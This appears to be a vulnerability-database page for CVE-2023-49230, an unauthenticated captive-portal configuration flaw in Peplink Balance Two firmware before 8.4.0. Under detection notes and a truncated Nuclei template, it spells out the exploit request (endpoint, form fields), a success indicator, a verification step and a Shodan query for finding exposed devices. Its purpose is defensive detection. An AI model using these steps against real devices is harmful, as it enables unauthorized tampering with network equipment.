CVE-2023-49230
published 2023-12-28CVE-2023-49230: An issue was discovered in Peplink Balance Two before 8.4.0. A missing authorization check in captive portals allows attackers to modify the portals'…
PriorityP259high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
2.05%
78.8th percentile
An issue was discovered in Peplink Balance Two before 8.4.0. A missing authorization check in captive portals allows attackers to modify the portals' configurations without prior authentication.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| peplink | balance_two_firmware | < 8.4.0 | 8.4.0 |
Detection & IOCsextracted from sources · hover to see the quote
url/guest/portal_admin_upload.cgi
url/guest/preview.cgi?portal_id=1
path/guest/api.cgi
commandPOST /guest/portal_admin_upload.cgi — multipart form-data with fields: option=edit_page, mode=submit, portal_id=1, data={JSON config}, logo_action=x
commandmode=info&option=preview&portal_id=1
- →Detect unauthenticated POST requests to /guest/portal_admin_upload.cgi with multipart/form-data containing option=edit_page and mode=submit — no session/auth cookie required.
- →A successful exploitation response contains the JSON string '"status": "save_success"' in the HTTP response body from /guest/portal_admin_upload.cgi.
- →Verify exploitation by issuing POST to /guest/api.cgi with body mode=info&option=preview&portal_id=1 and confirming the injected value appears in the response body with HTTP 200.
- →Shodan fingerprinting query for exposed Peplink Balance Two devices: html:"PEPLINK"
- →Fingerprint the target device by checking for the string 'Peplink' in the body of GET /cgi-bin/MANGA/index.cgi before attempting exploitation.
- ·The vulnerability only affects Peplink Balance Two firmware versions prior to 8.4.0; devices running 8.4.0 or later are not affected. ↗
- ·The attack requires user interaction (UI:R per CVSS), meaning full exploitation may depend on a victim action despite the missing authorization check being unauthenticated.
- ·The multipart boundary value used in the PoC template is fixed (370611892836891531633729116268); real-world requests may use different boundary strings.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
Peplink Balance Two before 8.4.0 - Unauthenticated Config Upload
nuclei·CVSS 8.8
CVE-2023-49230 [HIGH] Peplink Balance Two before 8.4.0 - Unauthenticated Config Upload
Peplink Balance Two before 8.4.0 - Unauthenticated Config Upload
A vulnerability in Peplink Balance Two prior to version 8.4.0 allows unauthenticated attackers to modify captive portal configurations due to a missing authorization check. Specifically, attackers can upload files via /guest/portal_admin_upload.cgi, with the changes reflected at /guest/preview.cgi?portal_id=1.
Template:
id: CVE-2023-49230
info:
name: Peplink Balance Two before 8.4.0 - Unauthenticated Config Upload
author: srilakivarma
severity: high
description: |
A vulnerability in Peplink Balance Two prior to version 8.4.0 allows unauthenticated attackers to modify captive portal configurations due to a missing authorization check. Specifically, attackers can upload files via /guest/portal_admin_upload.cgi, with the cha
No writeups or analysis indexed.
https://www.synacktiv.com/publications%253Ffield_tags_target_id%253D4https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdfhttps://www.synacktiv.com/publications%253Ffield_tags_target_id%253D4https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf
2023-12-28
Published